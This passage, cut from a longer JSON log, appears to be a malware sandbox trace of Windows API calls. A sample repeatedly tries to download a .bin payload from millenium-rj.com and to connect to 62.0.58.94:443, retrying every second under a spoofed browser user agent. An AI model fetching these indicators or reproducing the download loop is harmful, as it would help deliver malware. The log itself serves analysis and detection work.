"parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1699 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0084", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1700 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1701 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0084" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1702 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1703 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000518", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1704 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1705 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1706 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1707 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca}\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1708 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1709 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1710 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1711 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1712 }, { "timestamp": "2025-02-27 23:36:27,487", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1713 }, { "timestamp": "2025-02-27 23:36:29,503", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1714 }, { "timestamp": "2025-02-27 23:36:29,503", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1715 }, { "timestamp": "2025-02-27 23:36:29,503", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1716 }, { "timestamp": "2025-02-27 23:36:29,503", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0084" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1717 }, { "timestamp": "2025-02-27 23:36:29,503", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1718 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1719 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0088", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1720 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1721 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0088" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1722 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1723 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000520" } ], "repeated": 0, "id": 1724 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000524" } ], "repeated": 0, "id": 1725 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1726 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000500" } ], "repeated": 0, "id": 1727 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000510" } ], "repeated": 0, "id": 1728 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" } ], "repeated": 0, "id": 1729 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000051c" } ], "repeated": 0, "id": 1730 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1731 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000051c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1308" } ], "repeated": 0, "id": 1732 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000051c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1733 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000051c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\xc8\\xc4o\\x00" } ], "repeated": 0, "id": 1734 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1308" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1735 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000051c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca~\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1736 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1308" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1737 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000051c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1738 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000051c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1739 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1308" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1740 }, { "timestamp": "2025-02-27 23:36:30,519", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1308" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1741 }, { "timestamp": "2025-02-27 23:36:32,144", "thread_id": "8848", "caller": "0x771bbcf6", "parentcaller": "0x7718616c", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "8848" } ], "repeated": 0, "id": 1742 }, { "timestamp": "2025-02-27 23:36:32,144", "thread_id": "8848", "caller": "0x771bbd19", "parentcaller": "0x7718616c", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1743 }, { "timestamp": "2025-02-27 23:36:32,581", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1744 }, { "timestamp": "2025-02-27 23:36:32,581", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1308" } ], "repeated": 0, "id": 1745 }, { "timestamp": "2025-02-27 23:36:32,581", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1746 }, { "timestamp": "2025-02-27 23:36:32,581", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0088" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1747 }, { "timestamp": "2025-02-27 23:36:32,581", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1748 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1749 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc008c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1750 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1751 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc008c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1752 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1753 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000052c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1754 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1755 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1756 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1757 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1758 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1759 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1760 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1761 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1762 }, { "timestamp": "2025-02-27 23:36:33,597", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1763 }, { "timestamp": "2025-02-27 23:36:35,628", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1764 }, { "timestamp": "2025-02-27 23:36:35,628", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1765 }, { "timestamp": "2025-02-27 23:36:35,628", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1766 }, { "timestamp": "2025-02-27 23:36:35,628", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc008c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1767 }, { "timestamp": "2025-02-27 23:36:35,628", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1768 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "388", "caller": "0x771bbcf6", "parentcaller": "0x7718616c", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "388" } ], "repeated": 0, "id": 1769 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "388", "caller": "0x764e254a", "parentcaller": "0x76f69834", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" } ], "repeated": 0, "id": 1770 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "388", "caller": "0x764e254a", "parentcaller": "0x76f698b6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003ac" } ], "repeated": 0, "id": 1771 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "388", "caller": "0x771bbd19", "parentcaller": "0x7718616c", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1772 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "6820", "caller": "0x771bbcf6", "parentcaller": "0x7718616c", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": 